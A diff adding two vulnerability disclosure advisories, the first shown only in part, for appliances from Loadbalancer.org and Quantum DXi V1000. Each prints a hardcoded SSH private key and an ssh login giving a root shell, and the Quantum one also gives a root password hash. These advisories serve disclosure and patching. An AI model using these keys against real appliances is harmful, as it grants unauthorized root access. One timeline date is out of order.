+yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ
+rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+
+t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW
+cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY
+TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1
+MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl
+2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH
+SzmJVCWFyVuuANR2Bnc=
+-----END DSA PRIVATE KEY-----
+
+SSH to the Loadbalancer.org VM using this key:
+
+$ ssh -i lb root@192.168.2.21
+Last login: Wed Jan 29 09:12:10 2014 from 192.168.2.72
+-bash: warning: setlocale: LC_CTYPE: cannot change locale (UTF-8)
+[root@lbmaster ~]# id
+uid=0(root) gid=0(root)
+groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+[root@lbmaster ~]#
+
+
+
+-----------
+Solution:
+-----------
+
+Upgrade to version 7.5.3 or newer
+
+--------------
+Timeline:
+--------------
+
+30-01-2014 - Issues discovered and vendor notified
+15-01-2014 - Vendor replies, also made patch available.
+17-03-2014 - Public disclosure

platforms/unix/remote/32372.txt

@@ -0,0 +1,95 @@
+-----------
+Author:
+-----------
+
+xistence < xistence[at]0x90[.]nl >
+
+-------------------------
+Affected products:
+-------------------------
+
+Quantum DXi V1000 2.2.1 and below
+
+-------------------------
+Affected vendors:
+-------------------------
+
+Quantum
+http://quantum.com/
+
+-------------------------
+Product description:
+-------------------------
+
+Quantum DXi® V-Series is a virtual deduplication backup appliance that
+protects physical and
+virtual data across remote sites, the datacenter and cloud deployments.
+
+----------
+Details:
+----------
+
+[ 0x01 - Default root user ]
+
+The root user has a hardcoded password that is unknown and not changeable.
+Normally access is only through the restricted shells.
+
+The /etc/shadow file shows the following hash:
+root:$1$FGOgdWM7$dac9P0EJgTSX8a4zc4TXJ/:15783:0:99999:7:::
+
+
+[ 0x02 - Known SSH Private Key ]
+
+
+The /root/.ssh/authorized_keys on the appliance contains the following key
+(same with every deployment):
+
+-----BEGIN DSA PRIVATE KEY-----
+MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2
+hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t
+Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2
++o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4
+6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5
+PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr
+E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK
+6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn
+k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u
+B3Upsx556K/iZPPnJZE=
+-----END DSA PRIVATE KEY-----
+
+Using the key on a remote system to login through SSH will give a root
+shell:
+
+$ ssh -i quantum.key root@192.168.2.117
+Last login: Mon Sep 23 21:27:19 2013 from 192.168.2.71
+
+Product Model          = DXiV1000
+Hardware Configuration = V1000
+System Version         = 2.2.1_MC
+Base OS Version        = 2.2.1_MC-9499
+Application Version    = 2.2.1_MC-50278
+SCM Build Version      = Build14
+Kernel Version         = 2.6.18-164.15.1.qtm.4
+
+[root@DXi000C29FB1EA1 ~]# id
+uid=0(root) gid=0(root)
+groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),103(adic)
+
+
+-----------
+Solution:
+-----------
+
+Upgrade to version 2.3.0.1 or newer
+
+--------------
+Timeline:
+--------------
+
+30-09-2013 - Issues discovered and vendor notified
+30-09-2013 - Reply from vendor asking for more details
+01-10-2013 - Supplied more details how to replicate
+19-11-2013 - Asked for status update
+19-11-2013 - Reply from vendor that an updated release is due for March 2014
+xx-xx-2014 - Quantum DXi V1000 2.3.0.1 released
+17-03-2014 - Public disclosure